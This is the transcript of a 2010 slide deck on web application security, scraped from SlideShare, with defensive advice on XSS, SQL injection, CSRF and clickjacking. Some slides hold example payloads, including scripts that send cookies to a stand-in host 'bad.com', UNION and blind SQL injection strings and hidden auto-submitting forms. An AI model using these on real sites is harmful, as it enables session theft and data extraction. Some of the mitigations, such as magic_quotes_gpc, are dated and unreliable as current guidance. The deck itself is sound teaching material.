Best practices of web app security (samvel gevorgyan)
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

Best practices of web app security (samvel gevorgyan)

on

  • 4,346 views

 

Statistics

Views

Total Views
4,346
Views on SlideShare
4,304
Embed Views
42

Actions

Likes
1
Downloads
89
Comments
1

1 Embed 42

http://clubhack.com 42

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • “A clever person solves a problem. A wise person avoids it.”Albert Einstein

Best practices of web app security (samvel gevorgyan) Presentation Transcript

  • 1. BEST PRACTICES OF
    2010
    WEB APPLICATION SECURITY
    by SamvelGevorgyan
  • 2. STATISTICS OF VULNERABILITIES
    Source: ptresearch.blogspot.com/2010/06/web-application-vulnerability.html
  • 3. STATISTICS OF RISK LEVELS
    Source: ptresearch.blogspot.com/2010/06/web-application-vulnerability.html
  • 4. TOP 10 HIGH LEVEL VULNERABILITIES
    01. Cross-Site Scripting (XSS) [Symantec - 2007]
    02. Information leakage
    03. SQL Injection [~2005]
    04. Cross-Site Request Forgery (CSRF) [1990s]
    05. ClickJacking [J.Grossman and R.Hansen - 2008]
    06. Phishing[1987, 1996]
    07. Path Traversal or Local/Remote File Inclusion
    08. Shell injection
    09. Session Hijacking [early 2000s]
    10. File uploads
  • 5. CROSS-SITE SCRIPTING
    DESCRIPTION:
    Cross-Site Scripting is a type of web application vulnerability when the attacker injects his executable code into the vulnerable website.
    • EXAMPLE:
    http://site.com/search.php?q=<script>alert(“XSS”)</script>
  • 6. CROSS-SITE SCRIPTING
    TYPES:
    Non-Persistant
    Persistant
    1.Non-Persistant:
    In this type of XSS vulnerability the attacker is able to execute his own code in a website but no changes can be done in that website.
  • 7. CROSS-SITE SCRIPTING
    Non-Persistant
    EXAMPLE:
    http://www.site.com/viewtopic.php?id=4"><script>document.location="http://bad.com/logger.php?cookie="+document.cookie;</script>
    OR
    http://www.site.com/viewtopic.php?id=4”><script>document.write(“<img src=‘http://bad.com/logger.php?cookie=“+ document.cookie+”’/>”);</script>
  • 8. CROSS-SITE SCRIPTING
    2.Persistant:
    In this case attacker stores his executable script in the vulnerable website database which is being executed every time webpage is showing that data.
    Common targets are:
    • Comments
    • 9. Chat messages
    • 10. E-mail messages
    • 11. Wall posts, etc.
  • CROSS-SITE SCRIPTING
    Persistant
    EXAMPLE:
  • 12. CROSS-SITE SCRIPTING
    Persistant
    Comment in raw format:
    and I like the way this website developers
    work..hahaha :D :D
    <SCRIPT/XSS
    SRC="http://bad.com/xss.js">
    </SCRIPT>
  • 13. CROSS-SITE SCRIPTING
    Potentially Dangerous HTML elemets:
    TAGS
    • <applet>
    • 14. <body>
    • 15. <embed>
    • 16. <frame>
    • 17. <script>
    • 18. <frameset>
    • 19. <html>
    • 20. <iframe>
    • 21. <img>
    • 22. <style>
    • 23. <layer>
    • 24. <ilayer>
    • 25. <meta>
    • 26. <object> ,etc.
    ATTRIBUTES
    src, href, lowsrc, xmlns, style, etc.
  • 27. CROSS-SITE SCRIPTING
    Potentially Dangerous HTML events:
    • Onblur
    • 28. Onchange
    • 29. Onclick
    • 30. Ondrag
    • 31. Onerror
    • 32. Onfocus
    • 33. Onkeypress
    • 34. Onkeyup
    • 35. Onload
    • 36. Onmouseover
    • 37. Onmousemove
    • 38. Onmove
    • 39. Onresize
    • 40. Onselectstart
    • 41. Onselect
    • 42. Onsubmit
    • 43. Onunload
    • 44. Onscroll, etc.
    *all HTML events
  • 45. CROSS-SITE SCRIPTING
    SOLUTIONS:
    • PHP function strip_tags()
    • 46. PHP Input Filter
    • 47. PHP libraries:
    • 48. HTML_Safe
    • 49. htmLawed
    • 50. kses
    • 51. Safe HTML Checker, etc.
  • BEST SOLUTION
    OWASP HTML Purifier:
    SAFE
    HTML Purifier defeats XSS with an audited whitelist
    CLEAN
    HTML Purifier ensures standards-compliant output
    OPEN
    HTML Purifier is open-source and highly customizable
  • 52. BEST SOLUTION
    COMPARISON:
    Source: www.htmlpurifier.org/comparison
  • 53. BEST SOLUTION
    COMPARISON:
    Source: www.htmlpurifier.org/comparison
  • 54. INFORMATION LEAKAGE
    DESCRIPTION:
    Information Leakage is an application weakness where an application reveals sensitive data, such as technical details of the web application, environment, or user-specific data.
    • EXAMPLE:
    Warning: include(pages/../../../../../../etc/passwd1) [function.include]: failed to open stream: No such file or directory in /usr/www/users/kint/view.php on line 20
  • 55. INFORMATION LEAKAGE
    CAUSES OF:
    Directory listing misconfiguration
    Unproper error handling
    Unproper filetype handling
    Sensitive HTML comments, etc.
    1.Directory listing misconfiguration:
    Leaving directory listing enabled allows the attacker to read the list of all files in a directory.
  • 56. INFORMATION LEAKAGE
    Directory listing misconfiguration
    • EXAMPLE:
    Index of /admin
  • 57. INFORMATION LEAKAGE
    2.Unproper error handling:
    Because of unproper error handling all the unexpecting requests will generate error messages which will be visible to the attacker.
    • EXAMPLE:
    Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/aes/public_html/news/list.php on line 81
  • 58. INFORMATION LEAKAGE
    3.Unproper filetype handling:
    Unproper filetype handling allows your important files to be readable by the attacker.
    • EXAMPLE:
    • 59. sql_backup.tar.gz
    • 60. memberlist.xml
    • 61. phpinfo.html
    • 62. dbClass.inc
    • 63. Login.php.bkp
  • INFORMATION LEAKAGE
    Unproper filetype handling
    EXAMPLE:
    dbClass.inc

    private $host = "localhost";
    private $usr = “root“;
    private $pwd = “i7kT0w“;
    public $db = "brav_new";
    public function Connect(){ … }

  • 64. INFORMATION LEAKAGE
    4.Sensitive HTML comments:
    Notes left by webdevelopers may content important information which will cause of the information leakage.
    • EXAMPLE:
    <form enctype="multipart/form-data" action="upload.php" method="POST">
    <!--check for filetypes php, cgi, pl, bat, exe, dll, reg-->
    <input name="upload_file" type="file" />

  • 65. BEST SOLUTION
    Directory listing misconfiguration
    put a blank file named index.html in that directory.
    put a file named .htaccess in that directory consisting of only this line:Options –indexes
    NOTE: all sub-directories of that directory will also get their directory listings turned off.
  • 66. BEST SOLUTION
    Unproper error handling
    The following configurations should be done in php.ini file:
    • error_reporting = E_ALL
    • 67. display_errors = Off
    • 68. log_errors = On
    • 69. error_log = path/PHP_errors.log //any file in which the web server has write privileges.
  • BEST SOLUTION
    Unproper error handling
    Create an .htaccess file in public_html directory with the following lines:
    php_flag display_errors off
    php_flag log_errors on
    php_value error_log path/PHP_errors.log
    <Files path/PHP_errors.log>
    Order allow,deny
    Deny from all
    Satisfy All
    </Files
  • 70. BEST SOLUTION
    Unproper filetype handling
    Don’t keep your important files with the following extentions in your public web directory if you don’t link to them in the website:
    • Compressed files(*.zip, *.rar, *.tar.gz, etc.)
    • 71. Database files(*.sql, *.cvs, *.xml, *.xls, etc.)
    • 72. Unknown files(*.inc, *.copy, *.bkp, etc.)
  • BEST SOLUTION
    Sensitive HTML comments
    No sensetive HTML comment must be used in a website as every user will be able to view the webpage source code.
  • 73. SQL INJECTION
    DESCRIPTION:
    This is a type of vulnerability when attacker injects his custom SQL query to the request to get sensetive data from the database, read or write a file.
    • EXAMPLE:
    http://site.com/product.php?id=4+AND+1=2+UNION+SELECT+0,database(),1,2+--
  • 74. SQL INJECTION
    TYPES:
    Normal
    Blind
    1.Normal:
    In this type of SQL Injection vulnerability attacker sends a custom SQL query and gets the output in the screen.
  • 75. SQL INJECTION
    Normal SQL Injection
    • EXAMPLE:
    http://site.com/product.php?id=1348+AND+1=2+union+select+1,2,user(),database(),
    5,version(),7+--
  • 76. SQL INJECTION
    2.Blind:
    This type of injection is identical to normal SQL Injection except that the SQL query returns positive or negative response.
    • EXAMPLE:
    http://site.com/view.php?page=10+
    and+substring(@@version,1,1)=5+--
  • 77. SQL INJECTION
    SOLUTIONS:
    • PHP.ini configuration
    • 78. magic_quotes_gpc = on
    • 79. PHP functions
    • 80. filter_var()
    • 81. mysql_real_escape_string()
    • 82. sprintf()
    • 83. Put variables into the quotes(e.g: ‘$id’)
    • 84. Assign min privilages for mysql users
  • BEST SOLUTION
    GreenSQL open source database firewall:
    Activity monitoring and audit
    User rights management
    Real-time database protection
    Intrusion preventation(IPS)
    Database caching
    Encrypted comunication over SSL
    Virtual patching
    Reporting
  • 85. BEST SOLUTION
    GreenSQL open source database firewall:
  • 86. CROSS-SITE REQUEST FORGERY
    DESCRIPTION:
    This vulnerability of web application allows attacker’s website to manipulate its actions using authorized user’s session.
    • EXAMPLE:
    <img src=“http://site.com/share.php?url=http://bad.com” style=“display:none” />
  • 87. CROSS-SITE REQUEST FORGERY
    EXAMPLE:
    <div style=“display:none”>
    <iframe name=“hidden”></iframe>
    <form name=“Form” action= “http://site.com/post.php” target=“hidden” method=“POST”>
    <input type=“text” name=“message” value=“I like www.bad.com” />
    <input type=“submit” />
    </form>
    <script>document.Form.submit();</script>
    </div>
  • 88. CROSS-SITE REQUEST FORGERY
    USELESS DEFENSES:
    • Only accept POST
    Stops simple link-based attacks (IMG, frames, etc.)
    But hidden POST requests can be created with frames, scripts, etc.
    • Referer checking
    Some users prohibit referers, so you can’t just require referer headers
    Techniques to selectively create HTTP request without referers exist
    • Requiring multi-step transactions
    CSRF attack can perform each step in order
  • 89. CROSS-SITE REQUEST FORGERY
    SOLUTIONS:
    • CAPTHCAs
    This is a type of challenge-response test used in computing to ensure that the response is not generated by a computer.
    • One-time tokens
    Unlike the CAPTCHA’s system this is a unique number stored in the form field and in session to compare them after submiting the form.
  • 90. BEST SOLUTION
    Business Processing
    Add Tokento HTML
    OWASPCSRFGuard
    Verify Token
    OWASP CSRFGuard
    • Adds token to:
    • 91. href attribute
    • 92. src attribute
    • 93. hidden field in all forms
    • 94. Actions:
    • 95. Log
    • 96. Invalidate
    • 97. Redirect
    User
    (Browser)
    1. Add token with regex
    2. Add token with HTML parser
    3. Add token in browser with Javascript
    Source: www.owasp.org/index.php/CSRFGuard
  • 98. CLICK-JACKING
    DESCRIPTION:
    This is the advanced version of Cross-Site Request Forgery. It uses all the flexibility of front-end languages to bypass protected forms and send a request using victim’s active session.
    • EXAMPLE:
    <div style="position:fixed; width:100%; height:100%; z-index:999;" onclick="alert(‘ClickJacked');"></div>
  • 99. CLICK-JACKING
    EXAMPLE:
  • 100. BEST SOLUTION
    • FrameKiller(frame busting):
    <style> html{ display : none; }</style> <script>if( self == top ) { document.documentElement.style.display = 'block' ; } else { top.location = self.location; }
    </script>
    • OWASP CSRFGuard
  • THANK YOU!!
    SPECIAL THANKS FOR KIND SUPPORT:
    • MANU ZACHARIA
    MVP (Enterprise Security), ISLA-2010 (ISC)², C|EH, C|HFI, CCNA, MCP, AFCEH
    Certified ISO 27001:2005 LA
    • C-DAC ACTS
    Advanced Computing Training School